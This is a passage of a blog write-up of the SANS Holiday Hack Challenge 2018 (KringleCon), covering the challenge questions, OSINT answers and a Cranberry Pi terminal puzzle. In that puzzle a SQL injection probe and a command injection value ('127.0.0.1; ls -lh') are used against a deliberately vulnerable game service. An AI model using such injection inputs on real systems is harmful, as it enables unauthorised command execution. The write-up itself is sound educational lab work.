&lt;li&gt;&lt;a class="reference internal" href="#ad-privilege-discovery" id="id20"&gt;AD Privilege Discovery&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#holly-evergreen-s-cranberry-pi-challenge" id="id21"&gt;Holly Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sans-slingshot-linux-image" id="id22"&gt;SANS Slingshot Linux image&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#badge-manipulation" id="id23"&gt;Badge Manipulation&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#pepper-minstix-cranberry-pi-challenge" id="id24"&gt;Pepper Minstix' Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#bypassing-the-door-authentication-mechanism" id="id25"&gt;Bypassing the door authentication mechanism&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-haxxor-way" id="id26"&gt;The &amp;quot;haXXor&amp;quot; way&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#all-the-dead-ends-yay" id="id27"&gt;All the dead ends, yay!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-right-solution" id="id28"&gt;The right solution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#the-john-mcclane-way" id="id29"&gt;The &amp;quot;John McClane&amp;quot; way&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#hr-incident-response" id="id30"&gt;HR Incident Response&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sparkle-redberry-s-cranberry-pi-challenge" id="id31"&gt;Sparkle Redberry's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#elf-infosec-careers-website" id="id32"&gt;Elf InfoSec Careers Website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#network-traffic-forensics" id="id33"&gt;Network Traffic Forensics&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#sugarplum-mary-s-cranberry-pi-challenge" id="id34"&gt;SugarPlum Mary's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#packet-capture-and-analysis-website" id="id35"&gt;Packet Capture and Analysis Website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#ransomware-recovery" id="id36"&gt;Ransomware Recovery&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#shiny-upatree-s-cranberry-pi-challenge" id="id37"&gt;Shiny Upatree's Cranberry Pi Challenge&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id1" id="id38"&gt;Yannick's (dirty) solution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id2" id="id39"&gt;The &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#snort-rule" id="id40"&gt;Snort Rule&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#malware-dropper" id="id41"&gt;Malware Dropper&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#malware-analysis" id="id42"&gt;Malware Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#memory-dump-analysis" id="id43"&gt;Memory Dump Analysis&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id3" id="id44"&gt;All the dead ends, yay!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#id4" id="id45"&gt;The right solution&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#who-is-behind-it-all" id="id46"&gt;Who Is Behind It All?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answers-to-the-questions" id="id47"&gt;Answers to the questions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#conclusion" id="id48"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#appendix-chocolate-chip-cookie-recipe" id="id49"&gt;Appendix: Chocolate Chip Cookie Recipe&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id5"&gt;Introduction&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;This year, we're invited by Santa to KringleCon! It's a security conference,
with several talks by renowned security professionals. Santa organized this
conference because of the security breaches that occured during these past
Christmases. He also decided to up the physical security, as we can see toy
soldiers patrolling. They seem to obey to some guy named &lt;a class="reference external" href="https://en.wikipedia.org/wiki/List_of_Die_Hard_characters#Hans_Gruber"&gt;Hans&lt;/a&gt;,
who is also here. Let's hope that things don't go awry this year!&lt;/p&gt;
&lt;img alt="santa.png" class="align-center" src="/images/sans-christmas-challenge-2018/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome, my friends! Welcome to my castle! Would you come forward please?&lt;/p&gt;
&lt;p&gt;Welcome. It’s nice to have you here! I’m so glad you could come. This is
going to be such an exciting day!&lt;/p&gt;
&lt;p&gt;I hope you enjoy it. I think you will.&lt;/p&gt;
&lt;p&gt;Today is the start of KringleCon, our new conference for cyber security
practitioners and hackers around the world.&lt;/p&gt;
&lt;p&gt;KringleCon is designed to share tips and tricks to help leverage our skills
to make the world a better, safer place.&lt;/p&gt;
&lt;p&gt;Remember to look around, enjoy some talks by world-class speakers, and
mingle with our other guests.&lt;/p&gt;
&lt;p&gt;And, if you are interested in the background of this con, please check out
Ed Skoudis’ talk called &lt;a class="reference external" href="https://youtu.be/31JsKzsbFUo"&gt;START HERE&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Delighted to meet you. Overjoyed! Enraptured! Entranced! Are we ready? Yes!
In we go!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here are the questions we must answer:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;What phrase is revealed when you answer all of the &lt;a class="reference external" href="https://www.holidayhackchallenge.com/2018/challenges/osint_challenge_windows.html"&gt;KringleCon Holiday Hack
History questions&lt;/a&gt;?&lt;/li&gt;
&lt;li&gt;Who submitted (First Last) the rejected talk titled &lt;strong&gt;Data Loss for Rainbow
Teams: A Path in the Darkness&lt;/strong&gt;?&lt;/li&gt;
&lt;li&gt;The KringleCon Speaker Unpreparedness room is a place for frantic speakers
to furiously complete their presentations. The room is protected by a door
passcode. Upon entering the correct passcode, what message is presented to
the speaker?&lt;/li&gt;
&lt;li&gt;Retrieve the encrypted ZIP file from the North Pole Git repository. What is
the password to open this file?&lt;/li&gt;
&lt;li&gt;Using the data set contained in this &lt;a class="reference external" href="https://download.holidayhackchallenge.com/HHC2018-DomainHack_2018-12-19.ova"&gt;SANS Slingshot Linux image&lt;/a&gt;,
find a reliable path from a Kerberoastable user to the Domain Admins group.
What’s the user’s logon name (in &lt;a class="reference external" href="mailto:username&amp;#64;domain.tld"&gt;username&amp;#64;domain.tld&lt;/a&gt; format)?&lt;/li&gt;
&lt;li&gt;Bypass the authentication mechanism associated with the room near Pepper
Minstix. &lt;a class="reference external" href="https://www.holidayhackchallenge.com/2018/challenges/alabaster_badge.jpg"&gt;A sample employee badge is available&lt;/a&gt;.
What is the access control number revealed by the &lt;a class="reference external" href="https://scanomatic.kringlecastle.com/index.html"&gt;door authentication
panel&lt;/a&gt;?&lt;/li&gt;
&lt;li&gt;Santa uses an Elf Resources website to look for talented information
security professionals. &lt;a class="reference external" href="https://careers.kringlecastle.com/"&gt;Gain access to the website&lt;/a&gt; and fetch the document
&lt;code&gt;C:\candidate_evaluation.docx&lt;/code&gt;. Which terrorist organization is
secretly supported by the job applicant whose name begins with &amp;quot;K&amp;quot;?&lt;/li&gt;
&lt;li&gt;Santa has introduced a &lt;a class="reference external" href="https://packalyzer.kringlecastle.com/"&gt;web-based packet capture and analysis tool&lt;/a&gt; to support the elves and their
information security work. Using the system, access and decrypt HTTP/2
network activity. What is the name of the song described in the document
sent from Holly Evergreen to Alabaster Snowball?&lt;/li&gt;
&lt;li&gt;Alabaster Snowball is in dire need of your help. Santa's file server has
been hit with malware. Help Alabaster Snowball deal with the malware on
Santa's server by completing several tasks. To start, assist Alabaster by
accessing (clicking) the snort terminal below. Then create a rule that will
catch all new infections. What is the success message displayed by the Snort
terminal?&lt;/li&gt;
&lt;li&gt;After completing the prior question, Alabaster gives you a document he
suspects downloads the malware. What is the domain name the malware in the
document downloads from?&lt;/li&gt;
&lt;li&gt;Analyze the full malware source code to find a kill-switch and activate it
at the North Pole's domain registrar &lt;a class="reference external" href="https://hohohodaddy.kringlecastle.com/index.html"&gt;HoHoHo Daddy&lt;/a&gt;. What is the full
sentence text that appears on the domain registration success message
(bottom sentence)?&lt;/li&gt;
&lt;li&gt;After activating the kill-switch domain in the last question, Alabaster
gives you a &lt;a class="reference external" href="https://www.holidayhackchallenge.com/2018/challenges/forensic_artifacts.zip"&gt;zip file&lt;/a&gt;
with a memory dump and encrypted password database. Use these files to
decrypt Alabaster's password database. What is the password entered in the
database for the Vault entry?&lt;/li&gt;
&lt;li&gt;Use what you have learned from previous challenges to open the &lt;a class="reference external" href="https://pianolockn.kringlecastle.com/"&gt;door to
Santa's vault&lt;/a&gt;. What message do
you get when you unlock the door?&lt;/li&gt;
&lt;li&gt;Who was the mastermind behind the whole KringleCon plan?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;As was done last year, we'll try not to rely on the hints given by the elves,
because it's more fun to try to find solutions in your own way. This is what
allows you to come up with creative solutions. So I'll post the solutions to
the Cranberry Pi challenges, but we won't use the hints that are given after
solving.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer&lt;/strong&gt;: I did use the hints for question 12, but not before I wasted
soooo much time exploring soooo many dead-ends. Fun!&lt;/p&gt;
&lt;p&gt;As usual, I'll try to detail my thought process as much as possible, including
dead-ends and mistakes (that's the best way to learn).&lt;/p&gt;
&lt;p&gt;Alright, let's get to it!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="orientation-challenge"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id6"&gt;Orientation Challenge&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="bushy-evergreen-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id7"&gt;Bushy Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Bushy Evergreen seems to be having problem with exiting his text editor. Can
you guess the editor?&lt;/p&gt;
&lt;pre class="literal-block"&gt;
                ........................................
             .;oooooooooooool;,,,,,,,,:loooooooooooooll:
           .:oooooooooooooc;,,,,,,,,:ooooooooooooollooo:
         .';;;;;;;;;;;;;;,''''''''';;;;;;;;;;;;;,;ooooo:
       .''''''''''''''''''''''''''''''''''''''''';ooooo:
     ;oooooooooooool;''''''',:loooooooooooolc;',,;ooooo:
  .:oooooooooooooc;',,,,,,,:ooooooooooooolccoc,,,;ooooo:
.cooooooooooooo:,''''''',:ooooooooooooolcloooc,,,;ooooo,
coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;ooo,
coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;l'
coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,..
coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc.
coooooooooooooo,,,,,,,,,;ooooooooooooooloooo:.
coooooooooooooo,,,,,,,,,;ooooooooooooooloo;
:llllllllllllll,'''''''';llllllllllllllc,

I'm in quite a fix, I need a quick escape.
Pepper is quite pleased, while I watch here, agape.
Her editor's confusing, though &amp;quot;best&amp;quot; she says - she yells!
My lesson one and your role is exit back to shellz.

-Bushy Evergreen

Exit vi.
&lt;/pre&gt;
&lt;p&gt;We appear to be in a &lt;code&gt;vi&lt;/code&gt;-edited document, and we have to exit
&lt;code&gt;vi&lt;/code&gt;. Luckily for me, that's also my editor of choice. First, you have
to make sure that you are in command mode, by pressing &lt;code&gt;Escape&lt;/code&gt;. Then,
you can simply exit &lt;code&gt;vi&lt;/code&gt; by typing &lt;code&gt;:q&lt;/code&gt;, followed by &lt;code&gt;Enter&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What's more, if you press &lt;code&gt;Ctrl + C&lt;/code&gt; while in &lt;code&gt;vi&lt;/code&gt;, the following
message is displayed: &lt;code&gt;Type :quit&amp;lt;Enter&amp;gt; to exit Vim&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="kringlecon-holiday-hack-history-questions"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id8"&gt;KringleCon Holiday Hack History questions&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We are tasked with performing a little bit of &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Open-source_intelligence"&gt;OSINT&lt;/a&gt;
in order to answer some questions, regarding the three last SANS Christmas
Challenges. Fortunately, all the answers can be found in your favorite SANS
Christmas Challenge write-ups! The correct answers are marked, and I give you
a link to my past write-ups where the answers can be found. Alternatively, you
can find the answers in &lt;a class="reference external" href="https://www.youtube.com/watch?v=31JsKzsbFUo"&gt;Ed Skoudis' introduction video to KringleCon&lt;/a&gt;.&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;In 2015, the Dosis siblings asked for help understanding what piece of their
&amp;quot;Gnome in Your Home&amp;quot; toy?&lt;ol class="loweralpha"&gt;
&lt;li&gt;&lt;code&gt;[✓]&lt;/code&gt; Firmware (answer &lt;a class="reference external" href="/posts/2016/01/09/sans-christmas-challenge-2015/#part-2-ill-be-gnome-for-christmas-firmware-analysis-for-fun-and-profit"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Clothing&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Wireless adapter&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Flux capacitor&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;In 2015, the Dosis siblings disassembled the conspiracy dreamt up by which
corporation?&lt;ol class="loweralpha"&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Elgnirk&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[✓]&lt;/code&gt; ATNAS (answer &lt;a class="reference external" href="/posts/2016/01/09/sans-christmas-challenge-2015/#part-3-let-it-gnome-let-it-gnome-let-it-gnome-internet-wide-scavenger-hunt"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; GIYH&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Savvy, Inc.&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;In 2016, participants were sent off on a problem-solving quest based on what
artifact that Santa left?&lt;ol class="loweralpha"&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Tom-tom drums&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; DNA on a mug of milk&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Cookie crumbs&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[✓]&lt;/code&gt; Business card (answer &lt;a class="reference external" href="/posts/2017/01/05/sans-christmas-challenge-2016/#part-1-a-most-curious-business-card"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;In 2016, Linux terminals at the North Pole could be accessed with what kind
of computer?&lt;ol class="loweralpha"&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Snozberry Pi&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Blueberry Pi&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[✓]&lt;/code&gt; Cranberry Pi (answer &lt;a class="reference external" href="/posts/2017/01/05/sans-christmas-challenge-2016/#part-3-a-fresh-baked-holiday-pi"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Elderberry Pi&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;In 2017, the North Pole was being bombarded by giant objects. What were
they?&lt;ol class="loweralpha"&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; TCP packets&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[✓]&lt;/code&gt; Snowballs (answer &lt;a class="reference external" href="/posts/2018/01/10/sans-christmas-challenge-2017/#introduction"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Misfit toys&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Candy canes&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;In 2017, Sam the snowman needed help reassembling pages torn from what?&lt;ol class="loweralpha"&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; The Bash man page&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; Scrooge's payroll ledger&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[ ]&lt;/code&gt; System swap space&lt;/li&gt;
&lt;li&gt;&lt;code&gt;[✓]&lt;/code&gt; The Great Book (answer &lt;a class="reference external" href="/posts/2018/01/10/sans-christmas-challenge-2017/#introduction"&gt;here&lt;/a&gt;)&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Answering correctly these questions gives us the hidden phrase,
&lt;code&gt;Happy Trails&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="directory-browsing"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id9"&gt;Directory Browsing&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="minty-candycane-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id10"&gt;Minty Candycane's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;A new employee, Mr Chan, is arriving. However, in order to make his name tag,
we find his first name.&lt;/p&gt;
&lt;pre class="literal-block"&gt;
We just hired this new worker,
Californian or New Yorker?
Think he's making some new toy bag...
My job is to make his name tag.
Golly gee, I'm glad that you came,
I recall naught but his last name!
Use our system or your own plan,
Find the first name of our guy &amp;quot;Chan!&amp;quot;
-Bushy Evergreen
To solve this challenge, determine the new worker's first name and submit to runtoanswer.
====================================================================
=                                                                  =
= S A N T A ' S  C A S T L E  E M P L O Y E E  O N B O A R D I N G =
=                                                                  =
====================================================================
 Press  1 to start the onboard process.
 Press  2 to verify the system.
 Press  q to quit.
Please make a selection:
&lt;/pre&gt;
&lt;p&gt;We get access to a simple interface. By pressing &lt;code&gt;1&lt;/code&gt;, we can enter a new
employee's information:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Welcome to Santa&amp;#39;s Castle!
At Santa&amp;#39;s Castle, our employees are our family. We care for each other,
and support everyone in our common goals.
Your first test at Santa&amp;#39;s Castle is to complete the new employee onboarding paperwork.
Don&amp;#39;t worry, it&amp;#39;s an easy test! Just complete the required onboarding information below.
Enter your first name.
&lt;span class="hll"&gt;: John
&lt;/span&gt;Enter your last name.
&lt;span class="hll"&gt;: McClane
&lt;/span&gt;Enter your street address (line 1 of 2).
&lt;span class="hll"&gt;: Test Street
&lt;/span&gt;Enter your street address (line 2 of 2).
:
Enter your city.
&lt;span class="hll"&gt;: New York
&lt;/span&gt;Enter your postal code.
&lt;span class="hll"&gt;: 1111
&lt;/span&gt;Enter your phone number.
:
Enter your email address.
:
Is this correct?
John McClane
Test Street
New York, 1111
&lt;span class="hll"&gt;y/n: y
&lt;/span&gt;Save to sqlite DB using command line
Press Enter to continue...:
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Apparently, the result is saved in a SQLite database. We can try a SQL
injection, and we'll see that special characters are, indeed, not sanitized:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Welcome to Santa&amp;#39;s Castle!
At Santa&amp;#39;s Castle, our employees are our family. We care for each other,
and support everyone in our common goals.
Your first test at Santa&amp;#39;s Castle is to complete the new employee onboarding paperwork.
Don&amp;#39;t worry, it&amp;#39;s an easy test! Just complete the required onboarding information below.
Enter your first name.
&lt;span class="hll"&gt;: John&amp;#39;
&lt;/span&gt;Enter your last name.
:
Enter your street address (line 1 of 2).
:
Enter your street address (line 2 of 2).
:
Enter your city.
:
Enter your postal code.
:
Enter your phone number.
:
Enter your email address.
:
Is this correct?
John&amp;#39;

,
y/n: y
Save to sqlite DB using command line
&lt;span class="hll"&gt;Error: unrecognized token: &amp;quot;&amp;#39;John&amp;#39;&amp;#39;,&amp;#39;&amp;#39;, &amp;#39;&amp;#39;, &amp;#39;&amp;#39;, &amp;#39;&amp;#39;, &amp;#39;&amp;#39;, &amp;#39;&amp;#39;, &amp;#39;&amp;#39;)&amp;quot;
&lt;/span&gt;Press Enter to continue...:
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, there is indeed a SQL injection. However, it seems to be in an
&lt;code&gt;INSERT&lt;/code&gt;-kind of statement. While it's possible to perform SQL injection
in these statements, it's kind of a pain, because most of the time, you can't
get the result of your injection.&lt;/p&gt;
&lt;p&gt;So, let's take a look at the other functionality of the menu:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="hll"&gt;Please make a selection: 2
&lt;/span&gt;Validating data store for employee onboard information.
&lt;span class="hll"&gt;Enter address of server: 127.0.0.1
&lt;/span&gt;PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.070 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.051 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2039ms
rtt min/avg/max/mdev = 0.051/0.065/0.075/0.012 ms
onboard.db: SQLite 3.x database
Press Enter to continue...:
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the program seems to perform a &lt;code&gt;ping&lt;/code&gt; on an IP address that we give,
and then to analyze a file called &lt;code&gt;onboard.db&lt;/code&gt;, which seems to be our
SQLite database. Let's see if our IP address is correctly sanitized, or if we
can try some basic command injection:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Validating data store for employee onboard information.
&lt;span class="hll"&gt;Enter address of server: 127.0.0.1; ls -lh
&lt;/span&gt;PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.059 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.065 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.064 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 0.059/0.062/0.065/0.009 ms
total 5.4M
&lt;span class="hll"&gt;-rw-r--r-- 1 root root 3.8K Dec 14 16:13 menu.ps1
&lt;/span&gt;&lt;span class="hll"&gt;-rw-rw-rw- 1 root root  24K Dec 14 16:13 onboard.db
&lt;/span&gt;&lt;span class="hll"&gt;-rwxr-xr-x 1 root root 5.3M Dec 14 16:13 runtoanswer
&lt;/span&gt;onboard.db: SQLite 3.x database
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It worked! We were able to execute arbitrary commands, and list the content of
the current directory. The &lt;code&gt;menu.ps1&lt;/code&gt; file seems to be a PowerShell
script which displays the menu of the Cranberry Pi. The &lt;code&gt;runtoanswer&lt;/code&gt;
file seems to be an executable that we have to run in order to give our answer,
to wit the first name of Mr Chan. Let's take a look at &lt;code&gt;menu.ps1&lt;/code&gt;. We can
do this by using our arbitrary command execution to &lt;code&gt;cat menu.ps1&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nv"&gt;$global:firstrun&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$TRUE&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nb"&gt;Show-Menu&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$intro&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;@(&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;We just hired this new worker,&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;Californian or New Yorker?&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;Think he&amp;#39;s making some new toy bag...&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;My job is to make his name tag.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;Golly gee, I&amp;#39;m glad that you came,&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;I recall naught but his last name!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;Use our system or your own plan,&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;Find the first name of our guy &lt;/span&gt;&lt;span class="se"&gt;`&amp;quot;&lt;/span&gt;&lt;span class="s2"&gt;Chan!&lt;/span&gt;&lt;span class="se"&gt;`&amp;quot;&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;-Bushy Evergreen&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;To solve this challenge, determine the new worker&amp;#39;s first name and submit to runtoansw&lt;/span&gt;
&lt;span class="s2"&gt;er.&amp;quot;&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nv"&gt;$header&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;@(&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;====================================================================&amp;quot;&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;=                                                                  =&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;= S A N T A &amp;#39; S  C A S T L E  E M P L O Y E E  O N B O A R D I N G =&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;=                                                                  =&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s2"&gt;&amp;quot;====================================================================&amp;quot;&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nb"&gt;cls&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$global:firstrun&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="nv"&gt;$TRUE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;`n`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
